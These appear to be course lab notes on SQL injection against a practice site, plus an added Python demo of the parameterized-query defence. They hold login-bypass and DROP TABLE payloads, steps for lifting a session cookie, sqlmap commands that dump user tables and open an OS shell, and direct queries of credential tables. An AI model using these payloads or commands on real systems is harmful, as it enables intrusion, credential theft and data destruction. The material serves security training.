1. Perform SQL Injection attacks

SQL injection attacks target applications backed by SQL databases whose code does not adequately filter user input, enforce strong typing, or handle user input correctly when it builds and executes queries.

1. SQL Injection on MSSQL Database

Payloads to check the injection

'OR 1=1 -- 

Operations on database

Admin'; Insert into login values('john','apple123');--  //adding entry
blah'; DROP TABLE users; --
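
The payloads above only work when input is concatenated into the SQL text. The following is an added example, not part of the original lab notes, that contrasts a concatenated login query with a parameterized one and a typed numeric lookup. It assumes Python's sqlite3 as a stand-in for MSSQL; the table layout, function names and sample row are constructed for illustration.

```python
import sqlite3

def make_db():
    """In-memory SQLite stand-in for the lab database (constructed sample row)."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE login (id INTEGER PRIMARY KEY, username TEXT, password TEXT)")
    db.execute("INSERT INTO login (username, password) VALUES ('sam', 'test')")
    return db

def login_vulnerable(db, username, password):
    # User input is pasted into the SQL text: a quote in `username` closes the
    # string literal, and whatever follows is parsed as SQL.
    sql = ("SELECT 1 FROM login WHERE username = '" + username +
           "' AND password = '" + password + "'")
    return db.execute(sql).fetchone() is not None

def login_safe(db, username, password):
    # Placeholders send the values separately from the SQL text, so quotes,
    # semicolons and comment markers stay inside the compared string.
    sql = "SELECT 1 FROM login WHERE username = ? AND password = ?"
    return db.execute(sql, (username, password)).fetchone() is not None

def profile_by_id(db, raw_id):
    # Strong typing: a numeric parameter is converted before it reaches the
    # query; anything that is not an integer is rejected outright.
    try:
        user_id = int(raw_id)
    except (TypeError, ValueError):
        return None
    row = db.execute("SELECT username FROM login WHERE id = ?", (user_id,)).fetchone()
    return row[0] if row else None

def row_count(db):
    return db.execute("SELECT COUNT(*) FROM login").fetchone()[0]

# Payloads quoted from the notes above.
PAYLOADS = [
    "' OR 1=1 -- ",
    "Admin'; Insert into login values('john','apple123');--",
    "blah'; DROP TABLE users; --",
]

if __name__ == "__main__":
    db = make_db()
    print("concatenated query, tautology payload:", login_vulnerable(db, PAYLOADS[0], "x"))
    for p in PAYLOADS:
        print("parameterized query:", repr(p), login_safe(db, p, "x"))
    print("rows in login afterwards:", row_count(db))
```

With the parameterized query every payload is compared as a literal username, so the login fails and the table is left unchanged.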

2. Extract MSSQL Database with SQL MAP

  1. Navigate to http://www.moviescope.com/. A Login page loads; enter the Username and Password as sam and test, respectively. Click the Login button.

    If a Would you like Firefox to save this login for moviescope.com? notification appears at the top of the browser window, click Don’t Save.

  2. Once you are logged into the website, click the View Profile tab on the menu bar and, when the page has loaded, make a note of the URL in the address bar of the browser.

  3. Right-click anywhere on the webpage and click Inspect (Q) from the context menu, as shown in the screenshot.

  4. The Developer Tools frame appears in the lower section of the browser window. Click the Console tab, type document.cookie in the lower-left corner of the browser, and press Enter.

  5. Select the cookie value, then right-click and copy it, as shown in the screenshot. Minimize the web browser. Note down the URL of the web page.

  6. Open a Terminal window and execute sudo su to run the programs as a root user (When prompted, enter the password toor).

To retrieve the cookie from the console

document.cookie

Now use the following commands to extract the database.

sqlmap -u "http://www.moviescope.com/viewprofile.aspx?id=1" --cookie="mscope=1jwuydl=" --dbs
sqlmap -u "http://www.moviescope.com/viewprofile.aspx?id=1" --cookie="mscope=1jwuydl=; ui-tabs-1=0" -D moviescope --tables
sqlmap -u "http://www.moviescope.com/viewprofile.aspx?id=1" --cookie="mscope=1jwuydl=; ui-tabs-1=0" -D moviescope -T user-Login --dump

To get a shell

sqlmap -u "http://www.moviescope.com/viewprofile.aspx?id=1" --cookie="mscope=1jwuydl=; ui-tabs-1=0" --os-shell
TASKLIST
help

MySQL commands

mysql -u qdpmadmin -h 192.168.1.8 -p   # enter the password when prompted
show databases;
use qdpm;
show tables;
select * from users;
show databases;
use staff;
show tables;
select * from login;
select * from user;

You can also use other SQL injection tools such as Mole (https://sourceforge.net), jSQL Injection (https://github.com), NoSQLMap (https://github.com), Havij (https://github.com) and blind_sql_bitshifting (https://github.com).

SQL Map Tutorial
